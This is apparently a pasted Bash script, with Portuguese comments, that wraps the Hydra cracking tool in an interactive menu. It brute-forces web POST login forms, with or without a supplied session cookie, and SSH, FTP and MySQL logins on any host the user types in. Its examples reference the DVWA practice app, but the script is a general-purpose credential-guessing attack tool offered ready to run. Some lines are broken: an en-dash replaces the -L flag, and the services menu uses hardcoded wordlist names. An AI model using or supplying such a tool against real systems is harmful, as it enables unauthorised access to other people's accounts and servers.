Hydra [expert]

1. #!/bin/bash
2.  
3. # Observacao (exemplo do Comando GET)
4. # hydra -L user.txt -P pass.txt 192.168.0.19 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=security=low; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=f5dt3o4blpdfanrgsgjnv15ls6" -t4 -V---------------------
5.  
6.  
7. ---------------------
8. * DarkProgrammer000 *
9. ---------------------
10.  
11. # Funcao: Formulario POST
12. Post()
13. {
14.     metodo="http-post-form"
15.     echo -e "\033[01;31m -------------- EXEMPLO --------------- \033[00;37m"
16.     echo -e "\033[01;32m Wordlist [usuarios]: user              \033[00;37m"
17.     echo -e "\033[01;33m Wordlist [senhas]: pass                \033[00;37m"
18.     echo -e "\033[01;34m Host: www.exemplo.com                  \033[00;37m"
19.     echo -e "\033[01;35m Validacao: /dvwa/vulnerabilities/brute \033[00;37m"
20.     echo -e "\033[01;36m Campo [nome]: username                 \033[00;37m"
21.     echo -e "\033[01;37m Campo [senha]: password                \033[00;37m"
22.     echo -e "\033[01;31m Saida de erro: 'senha invalida'        \033[00;37m"
23.     echo -e "\033[01;32m Erro: 'senha invalida'                 \033[00;37m"
24.     echo -e "\033[01;30m -------------------------------------- \033[00;37m"
25.     echo ""
26.     echo -e -n "\033[01;32m + Wordlist (usuarios): \033[00;37m"
27.     read usuarios
28.  
29.     echo ""
30.     echo -e -n "\033[01;33m + Wordlist (senhas): \033[00;37m"
31.     read senhas
32.  
33.     echo ""
34.     echo -e -n "\033[01;34m + Host (Ex: www.site.com): \033[00;37m"
35.     read site
36.  
37.     echo ""
38.     echo -e -n "\033[01;35m + Validacao (Ex: /admin/validar.php): \033[00;37m"
39.     read validacao
40.  
41.     echo ""
42.     echo -e -n "\033[01;31m + Campo login (Ex: usuario): \033[00;37m"
43.     read user
44.  
45.     echo ""
46.     echo -e -n "\033[01;32m + Campo senha (Ex: senha): \033[00;37m"
47.     read pass
48.  
49.     echo ""
50.     echo -e -n "\033[01;33m + Saida de erro (Ex: invalido): \033[00;37m"
51.     read erro
52.     echo ""
53.  
54.     echo ""
55.     echo -e "\033[01;31m Informar Cookie: \033[00;37m"
56.     echo -e "\033[01;32m [1] Sim \033[00;37m"
57.     echo -e "\033[01;33m [2] Nao \033[00;37m"
58.     echo ""
59.     echo -e -n "\033[01;34m + Opc: \033[00;37m"
60.     read resp
61.  
62.     # Estrutura em escolha    
63.     case $resp in
64.         1)
65.             echo -e -n "\033[01;35m Cookie (Ex: Cookie: security=low; PHPSESSID=eh3utmffq3fuu0psbc1p24aah7): \033[00;37m"
66.             read cookie
67.        
68.             # Hydra (com cookie)
69.             hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro:H=$cookie" -V -t4
70.             ;;    
71.  
72.         2)
73.             # Hydra (sem cookie)
74.             hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro" -V -t4
75.             ;;
76.  
77.         *)
78.             ;;
79.     esac
80. }
81.  
82. # Funcao: Servicos
83. Services()
84. {
85.     echo -e "\033[01;31m -------------- EXEMPLO --------------- \033[00;37m"
86.     echo -e "\033[01;32m Wordlist [usuarios]: user              \033[00;37m"
87.         echo -e "\033[01;33m Wordlist [senhas]: pass                \033[00;37m"
88.         echo -e "\033[01;34m Host: www.exemplo.com                  \033[00;37m"
89.         echo -e "\033[01;30m -------------------------------------- \033[00;37m"
90.     echo ""
91.     echo -e -n "\033[01;34m + Host (Ex: www.site.com ou IP): \033[00;37m"
92.     read ip
93.  
94.     clear
95.     echo -e "\033[01;33m ---------------- \033[00;37m"
96.     echo -e "\033[01;33m     Services     \033[00;37m"
97.     echo -e "\033[01;33m ---------------- \033[00;37m"
98.     echo ""
99.     echo -e "\033[01;32m [1] SSH  \033[00;37m"
100.     echo -e "\033[01;33m [2] FTP \033[00;37m"
101.     echo -e "\033[01;34m [3] MYSQL \033[00;37m"
102.     echo ""
103.     echo -e -n "\033[01;35m + Opc: \033[00;37m"
104.     read escolha
105.     echo ""
106.  
107.     # Estrutura em escolha
108.     case $escolha in
109.  
110.         1)
111.             # Comando: ssh
112.             hydra -L user -P pass $ip ssh -t4 -V;;
113.         2)
114.             # Comando: ftp
115.             hydra –L user -P pass $ip ftp -t4 -V;;
116.         3)
117.             # Comando: mysql
118.             hydra –L user -P pass $ip mysql -t4 -V;;
119.        
120.         *) ;;
121.     esac
122. }
123.  
124. ####################
125. ##### PROGRAMA #####
126. ####################
127. clear
128. echo -e "\033[01;33m ------------- \033[00;37m"
129. echo -e "\033[01;33m     Hydra     \033[00;37m"
130. echo -e "\033[01;33m ------------- \033[00;37m"
131. echo ""
132. echo -e "\033[01;32m [1] Formulario (POST) \033[00;37m"
133. echo -e "\033[01;34m [2] Services \033[00;37m"
134. echo ""
135. echo -e -n "\033[01;35m + Opc: \033[00;37m"
136. read escolha
137. echo ""
138.  
139. # Estrutura em escolha
140. case $escolha in
141.    
142.     1)  Post;;        
143.     2)  Services ;;
144.     *)  ;;
145.  
146. esac